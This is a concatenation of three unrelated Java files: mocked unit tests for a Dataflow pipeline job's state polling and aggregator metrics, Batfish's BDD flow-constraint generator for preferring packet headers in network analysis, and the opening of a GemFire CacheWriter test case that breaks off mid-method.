statusResponse.setCurrentState("JOB_STATE_" + State.DONE.name());
when(mockJobs.get(eq(PROJECT_ID), eq(JOB_ID))).thenReturn(statusRequest);
when(statusRequest.execute()).thenReturn(statusResponse);
MonitoringUtil.JobMessagesHandler jobHandler = mock(MonitoringUtil.JobMessagesHandler.class);
Dataflow.Projects.Jobs.Messages mockMessages =
mock(Dataflow.Projects.Jobs.Messages.class);
Messages.List listRequest = mock(Dataflow.Projects.Jobs.Messages.List.class);
when(mockJobs.messages()).thenReturn(mockMessages);
when(mockMessages.list(eq(PROJECT_ID), eq(JOB_ID))).thenReturn(listRequest);
when(listRequest.execute()).thenThrow(SocketTimeoutException.class);
DataflowAggregatorTransforms dataflowAggregatorTransforms =
mock(DataflowAggregatorTransforms.class);
DataflowPipelineJob job = new DataflowPipelineJob(
PROJECT_ID, JOB_ID, mockWorkflowClient, dataflowAggregatorTransforms);
State state = job.waitToFinish(5, TimeUnit.MINUTES, jobHandler, fastClock, fastClock);
assertEquals(null, state);
}
public State mockWaitToFinishInState(State state) throws Exception {
Dataflow.Projects.Jobs.Get statusRequest = mock(Dataflow.Projects.Jobs.Get.class);
Job statusResponse = new Job();
statusResponse.setCurrentState("JOB_STATE_" + state.name());
when(mockJobs.get(eq(PROJECT_ID), eq(JOB_ID))).thenReturn(statusRequest);
when(statusRequest.execute()).thenReturn(statusResponse);
DataflowAggregatorTransforms dataflowAggregatorTransforms =
mock(DataflowAggregatorTransforms.class);
DataflowPipelineJob job = new DataflowPipelineJob(
PROJECT_ID, JOB_ID, mockWorkflowClient, dataflowAggregatorTransforms);
return job.waitToFinish(1, TimeUnit.MINUTES, null, fastClock, fastClock);
}
/**
* Tests that the {@link DataflowPipelineJob} understands that the {@link State#DONE DONE}
* state is terminal.
*/
@Test
public void testWaitToFinishDone() throws Exception {
assertEquals(State.DONE, mockWaitToFinishInState(State.DONE));
}
/**
* Tests that the {@link DataflowPipelineJob} understands that the {@link State#FAILED FAILED}
* state is terminal.
*/
@Test
public void testWaitToFinishFailed() throws Exception {
assertEquals(State.FAILED, mockWaitToFinishInState(State.FAILED));
}
/**
* Tests that the {@link DataflowPipelineJob} understands that the {@link State#FAILED FAILED}
* state is terminal.
*/
@Test
public void testWaitToFinishCancelled() throws Exception {
assertEquals(State.CANCELLED, mockWaitToFinishInState(State.CANCELLED));
}
/**
* Tests that the {@link DataflowPipelineJob} understands that the {@link State#FAILED FAILED}
* state is terminal.
*/
@Test
public void testWaitToFinishUpdated() throws Exception {
assertEquals(State.UPDATED, mockWaitToFinishInState(State.UPDATED));
}
@Test
public void testWaitToFinishFail() throws Exception {
Dataflow.Projects.Jobs.Get statusRequest = mock(Dataflow.Projects.Jobs.Get.class);
when(mockJobs.get(eq(PROJECT_ID), eq(JOB_ID))).thenReturn(statusRequest);
when(statusRequest.execute()).thenThrow(IOException.class);
DataflowAggregatorTransforms dataflowAggregatorTransforms =
mock(DataflowAggregatorTransforms.class);
DataflowPipelineJob job = new DataflowPipelineJob(
PROJECT_ID, JOB_ID, mockWorkflowClient, dataflowAggregatorTransforms);
long startTime = fastClock.nanoTime();
State state = job.waitToFinish(5, TimeUnit.MINUTES, null, fastClock, fastClock);
assertEquals(null, state);
long timeDiff = TimeUnit.NANOSECONDS.toMillis(fastClock.nanoTime() - startTime);
checkValidInterval(DataflowPipelineJob.MESSAGES_POLLING_INTERVAL,
DataflowPipelineJob.MESSAGES_POLLING_ATTEMPTS, timeDiff);
}
@Test
public void testWaitToFinishTimeFail() throws Exception {
Dataflow.Projects.Jobs.Get statusRequest = mock(Dataflow.Projects.Jobs.Get.class);
when(mockJobs.get(eq(PROJECT_ID), eq(JOB_ID))).thenReturn(statusRequest);
when(statusRequest.execute()).thenThrow(IOException.class);
DataflowAggregatorTransforms dataflowAggregatorTransforms =
mock(DataflowAggregatorTransforms.class);
DataflowPipelineJob job = new DataflowPipelineJob(
PROJECT_ID, JOB_ID, mockWorkflowClient, dataflowAggregatorTransforms);
long startTime = fastClock.nanoTime();
State state = job.waitToFinish(4, TimeUnit.MILLISECONDS, null, fastClock, fastClock);
assertEquals(null, state);
long timeDiff = TimeUnit.NANOSECONDS.toMillis(fastClock.nanoTime() - startTime);
// Should only sleep for the 4 ms remaining.
assertEquals(timeDiff, 4L);
}
@Test
public void testGetStateReturnsServiceState() throws Exception {
Dataflow.Projects.Jobs.Get statusRequest = mock(Dataflow.Projects.Jobs.Get.class);
Job statusResponse = new Job();
statusResponse.setCurrentState("JOB_STATE_" + State.RUNNING.name());
when(mockJobs.get(eq(PROJECT_ID), eq(JOB_ID))).thenReturn(statusRequest);
when(statusRequest.execute()).thenReturn(statusResponse);
DataflowAggregatorTransforms dataflowAggregatorTransforms =
mock(DataflowAggregatorTransforms.class);
DataflowPipelineJob job = new DataflowPipelineJob(
PROJECT_ID, JOB_ID, mockWorkflowClient, dataflowAggregatorTransforms);
assertEquals(
State.RUNNING,
job.getStateWithRetries(DataflowPipelineJob.STATUS_POLLING_ATTEMPTS, fastClock));
}
@Test
public void testGetStateWithExceptionReturnsUnknown() throws Exception {
Dataflow.Projects.Jobs.Get statusRequest = mock(Dataflow.Projects.Jobs.Get.class);
when(mockJobs.get(eq(PROJECT_ID), eq(JOB_ID))).thenReturn(statusRequest);
when(statusRequest.execute()).thenThrow(IOException.class);
DataflowAggregatorTransforms dataflowAggregatorTransforms =
mock(DataflowAggregatorTransforms.class);
DataflowPipelineJob job = new DataflowPipelineJob(
PROJECT_ID, JOB_ID, mockWorkflowClient, dataflowAggregatorTransforms);
long startTime = fastClock.nanoTime();
assertEquals(
State.UNKNOWN,
job.getStateWithRetries(DataflowPipelineJob.STATUS_POLLING_ATTEMPTS, fastClock));
long timeDiff = TimeUnit.NANOSECONDS.toMillis(fastClock.nanoTime() - startTime);
checkValidInterval(DataflowPipelineJob.STATUS_POLLING_INTERVAL,
DataflowPipelineJob.STATUS_POLLING_ATTEMPTS, timeDiff);
}
@Test
public void testGetAggregatorValuesWithNoMetricUpdatesReturnsEmptyValue()
throws IOException, AggregatorRetrievalException {
Aggregator<?, ?> aggregator = mock(Aggregator.class);
@SuppressWarnings("unchecked")
PTransform<PInput, POutput> pTransform = mock(PTransform.class);
String stepName = "s1";
String fullName = "Foo/Bar/Baz";
AppliedPTransform<?, ?, ?> appliedTransform = appliedPTransform(fullName, pTransform);
DataflowAggregatorTransforms aggregatorTransforms = new DataflowAggregatorTransforms(
ImmutableSetMultimap.<Aggregator<?, ?>, PTransform<?, ?>>of(aggregator, pTransform).asMap(),
ImmutableMap.<AppliedPTransform<?, ?, ?>, String>of(appliedTransform, stepName));
GetMetrics getMetrics = mock(GetMetrics.class);
when(mockJobs.getMetrics(PROJECT_ID, JOB_ID)).thenReturn(getMetrics);
JobMetrics jobMetrics = new JobMetrics();
when(getMetrics.execute()).thenReturn(jobMetrics);
jobMetrics.setMetrics(ImmutableList.<MetricUpdate>of());
Get getState = mock(Get.class);
when(mockJobs.get(PROJECT_ID, JOB_ID)).thenReturn(getState);
Job modelJob = new Job();
when(getState.execute()).thenReturn(modelJob);
modelJob.setCurrentState(State.RUNNING.toString());
DataflowPipelineJob job =
new DataflowPipelineJob(PROJECT_ID, JOB_ID, mockWorkflowClient, aggregatorTransforms);
AggregatorValues<?> values = job.getAggregatorValues(aggregator);
assertThat(values.getValues(), empty());
}
@Test
public void testGetAggregatorValuesWithNullMetricUpdatesReturnsEmptyValue()
throws IOException, AggregatorRetrievalException {
Aggregator<?, ?> aggregator = mock(Aggregator.class);
@SuppressWarnings("unchecked")
PTransform<PInput, POutput> pTransform = mock(PTransform.class);
String stepName = "s1";
String fullName = "Foo/Bar/Baz";
AppliedPTransform<?, ?, ?> appliedTransform = appliedPTransform(fullName, pTransform);
DataflowAggregatorTransforms aggregatorTransforms = new DataflowAggregatorTransforms(
ImmutableSetMultimap.<Aggregator<?, ?>, PTransform<?, ?>>of(aggregator, pTransform).asMap(),
ImmutableMap.<AppliedPTransform<?, ?, ?>, String>of(appliedTransform, stepName));
GetMetrics getMetrics = mock(GetMetrics.class);
when(mockJobs.getMetrics(PROJECT_ID, JOB_ID)).thenReturn(getMetrics);
JobMetrics jobMetrics = new JobMetrics();
when(getMetrics.execute()).thenReturn(jobMetrics);
jobMetrics.setMetrics(null);
Get getState = mock(Get.class);
when(mockJobs.get(PROJECT_ID, JOB_ID)).thenReturn(getState);
Job modelJob = new Job();
when(getState.execute()).thenReturn(modelJob);
modelJob.setCurrentState(State.RUNNING.toString());
DataflowPipelineJob job =
new DataflowPipelineJob(PROJECT_ID, JOB_ID, mockWorkflowClient, aggregatorTransforms);
AggregatorValues<?> values = job.getAggregatorValues(aggregator);
assertThat(values.getValues(), empty());
}
@Test
public void testGetAggregatorValuesWithSingleMetricUpdateReturnsSingletonCollection()
throws IOException, AggregatorRetrievalException {
CombineFn<Long, long[], Long> combineFn = new Sum.SumLongFn();
String aggregatorName = "agg";
Aggregator<Long, Long> aggregator = new TestAggregator<>(combineFn, aggregatorName);
@SuppressWarnings("unchecked")
PTransform<PInput, POutput> pTransform = mock(PTransform.class);
String stepName = "s1";
String fullName = "Foo/Bar/Baz";
AppliedPTransform<?, ?, ?> appliedTransform = appliedPTransform(fullName, pTransform);
DataflowAggregatorTransforms aggregatorTransforms = new DataflowAggregatorTransforms(
ImmutableSetMultimap.<Aggregator<?, ?>, PTransform<?, ?>>of(aggregator, pTransform).asMap(),
ImmutableMap.<AppliedPTransform<?, ?, ?>, String>of(appliedTransform, stepName));
GetMetrics getMetrics = mock(GetMetrics.class);
when(mockJobs.getMetrics(PROJECT_ID, JOB_ID)).thenReturn(getMetrics);
JobMetrics jobMetrics = new JobMetrics();
when(getMetrics.execute()).thenReturn(jobMetrics);
MetricUpdate update = new MetricUpdate();
long stepValue = 1234L;
update.setScalar(new BigDecimal(stepValue));
MetricStructuredName structuredName = new MetricStructuredName();
structuredName.setName(aggregatorName);
structuredName.setContext(ImmutableMap.of("step", stepName));
update.setName(structuredName);
jobMetrics.setMetrics(ImmutableList.of(update));
Get getState = mock(Get.class);
when(mockJobs.get(PROJECT_ID, JOB_ID)).thenReturn(getState);
Job modelJob = new Job();
when(getState.execute()).thenReturn(modelJob);
modelJob.setCurrentState(State.RUNNING.toString());
DataflowPipelineJob job =
new DataflowPipelineJob(PROJECT_ID, JOB_ID, mockWorkflowClient, aggregatorTransforms);
AggregatorValues<Long> values = job.getAggregatorValues(aggregator);
assertThat(values.getValuesAtSteps(), hasEntry(fullName, stepValue));
assertThat(values.getValuesAtSteps().size(), equalTo(1));
assertThat(values.getValues(), contains(stepValue));
assertThat(values.getTotalValue(combineFn), equalTo(Long.valueOf(stepValue)));
}
@Test
public void testGetAggregatorValuesWithMultipleMetricUpdatesReturnsCollection()
throws IOException, AggregatorRetrievalException {
CombineFn<Long, long[], Long> combineFn = new Sum.SumLongFn();
String aggregatorName = "agg";
Aggregator<Long, Long> aggregator = new TestAggregator<>(combineFn, aggregatorName);
@SuppressWarnings("unchecked")
PTransform<PInput, POutput> pTransform = mock(PTransform.class);
String stepName = "s1";
String fullName = "Foo/Bar/Baz";
AppliedPTransform<?, ?, ?> appliedTransform = appliedPTransform(fullName, pTransform);
@SuppressWarnings("unchecked")
PTransform<PInput, POutput> otherTransform = mock(PTransform.class);
String otherStepName = "s88";
String otherFullName = "Spam/Ham/Eggs";
AppliedPTransform<?, ?, ?> otherAppliedTransform =
appliedPTransform(otherFullName, otherTransform);
DataflowAggregatorTransforms aggregatorTransforms = new DataflowAggregatorTransforms(
ImmutableSetMultimap.<Aggregator<?, ?>, PTransform<?, ?>>of(
aggregator, pTransform, aggregator, otherTransform).asMap(),
ImmutableMap.<AppliedPTransform<?, ?, ?>, String>of(
appliedTransform, stepName, otherAppliedTransform, otherStepName));
GetMetrics getMetrics = mock(GetMetrics.class);
when(mockJobs.getMetrics(PROJECT_ID, JOB_ID)).thenReturn(getMetrics);
JobMetrics jobMetrics = new JobMetrics();
when(getMetrics.execute()).thenReturn(jobMetrics);
MetricUpdate updateOne = new MetricUpdate();
long stepValue = 1234L;
updateOne.setScalar(new BigDecimal(stepValue));
MetricStructuredName structuredNameOne = new MetricStructuredName();
structuredNameOne.setName(aggregatorName);
structuredNameOne.setContext(ImmutableMap.of("step", stepName));
updateOne.setName(structuredNameOne);
MetricUpdate updateTwo = new MetricUpdate();
long stepValueTwo = 1024L;
updateTwo.setScalar(new BigDecimal(stepValueTwo));
MetricStructuredName structuredNameTwo = new MetricStructuredName();
structuredNameTwo.setName(aggregatorName);
structuredNameTwo.setContext(ImmutableMap.of("step", otherStepName));
updateTwo.setName(structuredNameTwo);
jobMetrics.setMetrics(ImmutableList.of(updateOne, updateTwo));
Get getState = mock(Get.class);
when(mockJobs.get(PROJECT_ID, JOB_ID)).thenReturn(getState);
Job modelJob = new Job();
when(getState.execute()).thenReturn(modelJob);
modelJob.setCurrentState(State.RUNNING.toString());
DataflowPipelineJob job =
new DataflowPipelineJob(PROJECT_ID, JOB_ID, mockWorkflowClient, aggregatorTransforms);
AggregatorValues<Long> values = job.getAggregatorValues(aggregator);
assertThat(values.getValuesAtSteps(), hasEntry(fullName, stepValue));
assertThat(values.getValuesAtSteps(), hasEntry(otherFullName, stepValueTwo));
assertThat(values.getValuesAtSteps().size(), equalTo(2));
assertThat(values.getValues(), containsInAnyOrder(stepValue, stepValueTwo));
assertThat(values.getTotalValue(combineFn), equalTo(Long.valueOf(stepValue + stepValueTwo)));
}
@Test
public void testGetAggregatorValuesWithUnrelatedMetricUpdateIgnoresUpdate()
throws IOException, AggregatorRetrievalException {
CombineFn<Long, long[], Long> combineFn = new Sum.SumLongFn();
String aggregatorName = "agg";
Aggregator<Long, Long> aggregator = new TestAggregator<>(combineFn, aggregatorName);
@SuppressWarnings("unchecked")
PTransform<PInput, POutput> pTransform = mock(PTransform.class);
String stepName = "s1";
String fullName = "Foo/Bar/Baz";
AppliedPTransform<?, ?, ?> appliedTransform = appliedPTransform(fullName, pTransform);
DataflowAggregatorTransforms aggregatorTransforms = new DataflowAggregatorTransforms(
ImmutableSetMultimap.<Aggregator<?, ?>, PTransform<?, ?>>of(aggregator, pTransform).asMap(),
ImmutableMap.<AppliedPTransform<?, ?, ?>, String>of(appliedTransform, stepName));
GetMetrics getMetrics = mock(GetMetrics.class);
when(mockJobs.getMetrics(PROJECT_ID, JOB_ID)).thenReturn(getMetrics);
JobMetrics jobMetrics = new JobMetrics();
when(getMetrics.execute()).thenReturn(jobMetrics);
MetricUpdate ignoredUpdate = new MetricUpdate();
ignoredUpdate.setScalar(null);
MetricStructuredName ignoredName = new MetricStructuredName();
ignoredName.setName("ignoredAggregator.elementCount.out0");
ignoredName.setContext(null);
ignoredUpdate.setName(ignoredName);
jobMetrics.setMetrics(ImmutableList.of(ignoredUpdate));
Get getState = mock(Get.class);
when(mockJobs.get(PROJECT_ID, JOB_ID)).thenReturn(getState);
Job modelJob = new Job();
when(getState.execute()).thenReturn(modelJob);
modelJob.setCurrentState(State.RUNNING.toString());
DataflowPipelineJob job =
new DataflowPipelineJob(PROJECT_ID, JOB_ID, mockWorkflowClient, aggregatorTransforms);
AggregatorValues<Long> values = job.getAggregatorValues(aggregator);
assertThat(values.getValuesAtSteps().entrySet(), empty());
assertThat(values.getValues(), empty());
}
@Test
public void testGetAggregatorValuesWithUnusedAggregatorThrowsException()
throws AggregatorRetrievalException {
Aggregator<?, ?> aggregator = mock(Aggregator.class);
DataflowAggregatorTransforms aggregatorTransforms = new DataflowAggregatorTransforms(
ImmutableSetMultimap.<Aggregator<?, ?>, PTransform<?, ?>>of().asMap(),
ImmutableMap.<AppliedPTransform<?, ?, ?>, String>of());
DataflowPipelineJob job =
new DataflowPipelineJob(PROJECT_ID, JOB_ID, mockWorkflowClient, aggregatorTransforms);
thrown.expect(IllegalArgumentException.class);
thrown.expectMessage("not used in this pipeline");
job.getAggregatorValues(aggregator);
}
@Test
public void testGetAggregatorValuesWhenClientThrowsExceptionThrowsAggregatorRetrievalException()
throws IOException, AggregatorRetrievalException {
CombineFn<Long, long[], Long> combineFn = new Sum.SumLongFn();
String aggregatorName = "agg";
Aggregator<Long, Long> aggregator = new TestAggregator<>(combineFn, aggregatorName);
@SuppressWarnings("unchecked")
PTransform<PInput, POutput> pTransform = mock(PTransform.class);
String stepName = "s1";
String fullName = "Foo/Bar/Baz";
AppliedPTransform<?, ?, ?> appliedTransform = appliedPTransform(fullName, pTransform);
DataflowAggregatorTransforms aggregatorTransforms = new DataflowAggregatorTransforms(
ImmutableSetMultimap.<Aggregator<?, ?>, PTransform<?, ?>>of(aggregator, pTransform).asMap(),
ImmutableMap.<AppliedPTransform<?, ?, ?>, String>of(appliedTransform, stepName));
GetMetrics getMetrics = mock(GetMetrics.class);
when(mockJobs.getMetrics(PROJECT_ID, JOB_ID)).thenReturn(getMetrics);
IOException cause = new IOException();
when(getMetrics.execute()).thenThrow(cause);
Get getState = mock(Get.class);
when(mockJobs.get(PROJECT_ID, JOB_ID)).thenReturn(getState);
Job modelJob = new Job();
when(getState.execute()).thenReturn(modelJob);
modelJob.setCurrentState(State.RUNNING.toString());
DataflowPipelineJob job =
new DataflowPipelineJob(PROJECT_ID, JOB_ID, mockWorkflowClient, aggregatorTransforms);
thrown.expect(AggregatorRetrievalException.class);
thrown.expectCause(is(cause));
thrown.expectMessage(aggregator.toString());
thrown.expectMessage("when retrieving Aggregator values for");
job.getAggregatorValues(aggregator);
}
private static class TestAggregator<InT, OutT> implements Aggregator<InT, OutT> {
private final CombineFn<InT, ?, OutT> combineFn;
private final String name;
public TestAggregator(CombineFn<InT, ?, OutT> combineFn, String name) {
this.combineFn = combineFn;
this.name = name;
}
@Override
public void addValue(InT value) {
throw new AssertionError();
}
@Override
public String getName() {
return name;
}
@Override
public CombineFn<InT, ?, OutT> getCombineFn() {
return combineFn;
}
}
private AppliedPTransform<?, ?, ?> appliedPTransform(
String fullName, PTransform<PInput, POutput> transform) {
return AppliedPTransform.of(fullName, mock(PInput.class), mock(POutput.class), transform);
}
}
|
|
package org.batfish.common.bdd;
import static org.batfish.datamodel.PacketHeaderConstraintsUtil.DEFAULT_PACKET_LENGTH;
import com.google.common.annotations.VisibleForTesting;
import com.google.common.collect.ImmutableList;
import io.opentracing.Scope;
import io.opentracing.Span;
import io.opentracing.util.GlobalTracer;
import java.util.List;
import net.sf.javabdd.BDD;
import org.batfish.common.BatfishException;
import org.batfish.datamodel.IcmpType;
import org.batfish.datamodel.Ip;
import org.batfish.datamodel.IpProtocol;
import org.batfish.datamodel.NamedPort;
import org.batfish.datamodel.Prefix;
/** This class generates common useful flow constraints as BDDs. */
public final class BDDFlowConstraintGenerator {
/** Allows a caller to express preferences on how packets should be retrieved. */
public enum FlowPreference {
/** Prefers ICMP over UDP over TCP. */
DEBUGGING,
/** Prefers TCP over UDP over ICMP. */
APPLICATION,
/**
* Prefers TCP over UDP over ICMP. Not currently different from {@link #APPLICATION}, but may
* change.
*/
TESTFILTER,
/** Prefers UDP traceroute. */
TRACEROUTE
}
@VisibleForTesting static final Prefix PRIVATE_SUBNET_10 = Prefix.parse("10.0.0.0/8");
@VisibleForTesting static final Prefix PRIVATE_SUBNET_172 = Prefix.parse("172.16.0.0/12");
@VisibleForTesting static final Prefix PRIVATE_SUBNET_192 = Prefix.parse("192.168.0.0/16");
@VisibleForTesting static final Prefix RESERVED_DOCUMENTATION_192 = Prefix.parse("192.0.2.0/24");
@VisibleForTesting
static final Prefix RESERVED_DOCUMENTATION_198 = Prefix.parse("198.51.100.0/24");
@VisibleForTesting
static final Prefix RESERVED_DOCUMENTATION_203 = Prefix.parse("203.0.113.0/24");
static final int UDP_TRACEROUTE_FIRST_PORT = 33434;
static final int UDP_TRACEROUTE_LAST_PORT = 33534;
private final BDDPacket _bddPacket;
private final BDDOps _bddOps;
private final List<BDD> _icmpConstraints;
private final List<BDD> _udpConstraints;
private final List<BDD> _tcpConstraints;
private final BDD _defaultPacketLength;
private final List<BDD> _ipConstraints;
private final BDD _udpTraceroute;
BDDFlowConstraintGenerator(BDDPacket pkt) {
Span span = GlobalTracer.get().buildSpan("construct BDDFlowConstraintGenerator").start();
try (Scope scope = GlobalTracer.get().scopeManager().activate(span)) {
assert scope != null; // avoid unused warning
_bddPacket = pkt;
_bddOps = new BDDOps(pkt.getFactory());
_defaultPacketLength = _bddPacket.getPacketLength().value(DEFAULT_PACKET_LENGTH);
_udpTraceroute = computeUdpTraceroute();
_icmpConstraints = computeICMPConstraint();
_udpConstraints = computeUDPConstraints();
_tcpConstraints = computeTCPConstraints();
_ipConstraints = computeIpConstraints();
}
}
private List<BDD> computeICMPConstraint() {
BDD icmp = _bddPacket.getIpProtocol().value(IpProtocol.ICMP);
BDDIcmpType type = _bddPacket.getIcmpType();
BDD codeZero = _bddPacket.getIcmpCode().value(0);
// Prefer ICMP Echo_Request, then anything with code 0, then anything ICMP/
return ImmutableList.of(
_bddOps.and(icmp, type.value(IcmpType.ECHO_REQUEST), codeZero),
_bddOps.and(icmp, codeZero),
icmp);
}
private BDD emphemeralPort(BDDInteger portInteger) {
return portInteger.geq(NamedPort.EPHEMERAL_LOWEST.number());
}
private List<BDD> tcpPortPreferences(BDD tcp, BDDInteger tcpPort) {
return ImmutableList.of(
_bddOps.and(tcp, tcpPort.value(NamedPort.HTTP.number())),
_bddOps.and(tcp, tcpPort.value(NamedPort.HTTPS.number())),
_bddOps.and(tcp, tcpPort.value(NamedPort.SSH.number())),
// at least not zero if possible
_bddOps.and(tcp, tcpPort.value(0).not()));
}
private List<BDD> tcpFlagPreferences(BDD tcp) {
return ImmutableList.of(
// Force all the rarely used flags off
_bddOps.and(tcp, _bddPacket.getTcpCwr().not()),
_bddOps.and(tcp, _bddPacket.getTcpEce().not()),
_bddOps.and(tcp, _bddPacket.getTcpPsh().not()),
_bddOps.and(tcp, _bddPacket.getTcpUrg().not()),
// Less rarely used flags
_bddOps.and(tcp, _bddPacket.getTcpFin().not()),
// Sometimes used flags
_bddOps.and(tcp, _bddPacket.getTcpRst().not()),
// Prefer SYN, SYN_ACK, ACK
_bddOps.and(tcp, _bddPacket.getTcpSyn(), _bddPacket.getTcpAck().not()),
_bddOps.and(tcp, _bddPacket.getTcpAck(), _bddPacket.getTcpSyn()),
_bddOps.and(tcp, _bddPacket.getTcpAck()));
}
// Get TCP packets with special named ports, trying to find cases where only one side is
// ephemeral.
private List<BDD> computeTCPConstraints() {
BDDInteger dstPort = _bddPacket.getDstPort();
BDDInteger srcPort = _bddPacket.getSrcPort();
BDD tcp = _bddPacket.getIpProtocol().value(IpProtocol.TCP);
BDD srcPortEphemeral = emphemeralPort(srcPort);
BDD dstPortEphemeral = emphemeralPort(dstPort);
return ImmutableList.<BDD>builder()
// First, try to nudge src and dst port apart. E.g., if one is ephemeral the other is not.
.add(_bddOps.and(tcp, srcPortEphemeral, dstPortEphemeral.not()))
.add(_bddOps.and(tcp, srcPortEphemeral.not(), dstPortEphemeral))
// Next, execute port preferences.
.addAll(tcpPortPreferences(tcp, srcPort))
.addAll(tcpPortPreferences(tcp, dstPort))
// Next execute flag preferences.
.addAll(tcpFlagPreferences(tcp))
// Anything TCP.
.add(tcp)
.build();
}
private List<BDD> udpPortPreferences(BDD udp, BDDInteger tcpPort) {
return ImmutableList.of(
_bddOps.and(udp, tcpPort.value(NamedPort.DOMAIN.number())),
_bddOps.and(udp, tcpPort.value(NamedPort.SNMP.number())),
_bddOps.and(udp, tcpPort.value(NamedPort.SNMPTRAP.number())),
// at least not zero if possible
_bddOps.and(udp, tcpPort.value(0).not()));
}
private BDD computeUdpTraceroute() {
BDDInteger dstPort = _bddPacket.getDstPort();
BDDInteger srcPort = _bddPacket.getSrcPort();
BDD udp = _bddPacket.getIpProtocol().value(IpProtocol.UDP);
return _bddOps.and(
udp,
dstPort.range(UDP_TRACEROUTE_FIRST_PORT, UDP_TRACEROUTE_LAST_PORT),
srcPort.geq(NamedPort.EPHEMERAL_LOWEST.number()));
}
// Get UDP packets with special named ports, trying to find cases where only one side is
// ephemeral.
private List<BDD> computeUDPConstraints() {
BDDInteger dstPort = _bddPacket.getDstPort();
BDDInteger srcPort = _bddPacket.getSrcPort();
BDD udp = _bddPacket.getIpProtocol().value(IpProtocol.UDP);
BDD srcPortEphemeral = emphemeralPort(srcPort);
BDD dstPortEphemeral = emphemeralPort(dstPort);
return ImmutableList.<BDD>builder()
// Try for UDP traceroute.
.add(_udpTraceroute)
// Next, try to nudge src and dst port apart. E.g., if one is ephemeral the other is not.
.add(_bddOps.and(udp, srcPortEphemeral, dstPortEphemeral.not()))
.add(_bddOps.and(udp, srcPortEphemeral.not(), dstPortEphemeral))
// Next, execute port preferences
.addAll(udpPortPreferences(udp, srcPort))
.addAll(udpPortPreferences(udp, dstPort))
// Anything UDP.
.add(udp)
.build();
}
@VisibleForTesting
static BDD isPrivateIp(BDDOps ops, IpSpaceToBDD ip) {
return ops.or(
ip.toBDD(PRIVATE_SUBNET_10), ip.toBDD(PRIVATE_SUBNET_172), ip.toBDD(PRIVATE_SUBNET_192));
}
@VisibleForTesting
static BDD isDocumentationIp(BDDOps ops, IpSpaceToBDD ip) {
return ops.or(
ip.toBDD(RESERVED_DOCUMENTATION_192),
ip.toBDD(RESERVED_DOCUMENTATION_198),
ip.toBDD(RESERVED_DOCUMENTATION_203));
}
private static List<BDD> ipPreferences(BDDInteger ipInteger) {
return ImmutableList.of(
// First, one of the special IPs.
ipInteger.value(Ip.parse("8.8.8.8").asLong()),
ipInteger.value(Ip.parse("1.1.1.1").asLong()),
// Next, at least don't start with 0.
ipInteger.geq(Ip.parse("1.0.0.0").asLong()),
// Next, try to be in class A.
ipInteger.leq(Ip.parse("126.255.255.254").asLong()));
}
private List<BDD> computeIpConstraints() {
BDD srcIpPrivate = isPrivateIp(_bddOps, _bddPacket.getSrcIpSpaceToBDD());
BDD dstIpPrivate = isPrivateIp(_bddOps, _bddPacket.getDstIpSpaceToBDD());
return ImmutableList.<BDD>builder()
// 0. Try to not use documentation IPs if that is possible.
.add(isDocumentationIp(_bddOps, _bddPacket.getSrcIpSpaceToBDD()).not())
.add(isDocumentationIp(_bddOps, _bddPacket.getDstIpSpaceToBDD()).not())
// First, try to nudge src and dst IP apart. E.g., if one is private the other should be
// public.
.add(_bddOps.and(srcIpPrivate, dstIpPrivate.not()))
.add(_bddOps.and(srcIpPrivate.not(), dstIpPrivate))
// Next, execute IP preferences
.addAll(ipPreferences(_bddPacket.getSrcIp()))
.addAll(ipPreferences(_bddPacket.getDstIp()))
.build();
}
public List<BDD> generateFlowPreference(FlowPreference preference) {
switch (preference) {
case DEBUGGING:
return ImmutableList.<BDD>builder()
.addAll(_icmpConstraints)
.addAll(_udpConstraints)
.addAll(_tcpConstraints)
.addAll(_ipConstraints)
.add(_defaultPacketLength)
.build();
case APPLICATION:
case TESTFILTER:
return ImmutableList.<BDD>builder()
.addAll(_tcpConstraints)
.addAll(_udpConstraints)
.addAll(_icmpConstraints)
.addAll(_ipConstraints)
.add(_defaultPacketLength)
.build();
case TRACEROUTE:
return ImmutableList.<BDD>builder()
.addAll(_udpConstraints)
.addAll(_tcpConstraints)
.addAll(_icmpConstraints)
.addAll(_ipConstraints)
.add(_defaultPacketLength)
.build();
default:
throw new BatfishException("Not supported flow preference");
}
}
}
|
|
/*
* Copyright (c) 2010-2015 Pivotal Software, Inc. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you
* may not use this file except in compliance with the License. You
* may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
* implied. See the License for the specific language governing
* permissions and limitations under the License. See accompanying
* LICENSE file.
*/
package com.gemstone.gemfire.cache30;
import com.gemstone.gemfire.cache.*;
//import com.gemstone.gemfire.cache.util.*;
//import java.util.*;
/**
* An abstract class whose test methods test the functionality of
* {@link CacheWriter}s that are invoked locally.
*
* @see MultiVMRegionTestCase#testRemoteCacheWriter
*
* @author David Whitlock
*
* @since 3.0
*/
public abstract class CacheWriterTestCase
extends RegionAttributesTestCase {
public CacheWriterTestCase(String name) {
super(name);
}
/////////////////////// Test Methods ///////////////////////
/**
* Tests that the <code>CacheWriter</code> is called before an entry
* is {@linkplain CacheWriter#beforeCreate created}.
*/
public void testCacheWriterBeforeCreate() throws CacheException {
String name = this.getUniqueName();
final Object key = this.getUniqueName();
final Object value = new Integer(42);
final Object arg = "ARG";
final String exception = "EXCEPTION";
TestCacheWriter writer = new TestCacheWriter() {
public void beforeCreate2(EntryEvent event)
throws CacheWriterException {
assertEquals(key, event.getKey());
assertEquals(value, event.getNewValue());
assertNull(event.getOldValue());
assertTrue(event.getOperation().isCreate());
assertFalse(event.getOperation().isLoad());
assertFalse(event.getOperation().isLocalLoad());
assertFalse(event.getOperation().isNetLoad());
assertFalse(event.getOperation().isNetSearch());
Object argument = event.getCallbackArgument();
if (argument != null) {
if (argument.equals(exception)) {
String s = "Test CacheWriterException";
throw new CacheWriterException(s);
} else {
assertEquals(arg, argument);
}
}
}
public void beforeDestroy2(EntryEvent event)
throws CacheWriterException {
// This method will get invoked when the region is populated
}
};
AttributesFactory factory =
new AttributesFactory(getRegionAttributes());
factory.setCacheWriter(writer);
Region region =
createRegion(name, factory.create());
region.create(key, value);
assertTrue(writer.wasInvoked());
region.destroy(key);
assertTrue(writer.wasInvoked());
region.put(key, value);
assertTrue(writer.wasInvoked());
region.destroy(key);
assertTrue(writer.wasInvoked());
region.create(key, value, arg);
assertTrue(writer.wasInvoked());
region.destroy(key);
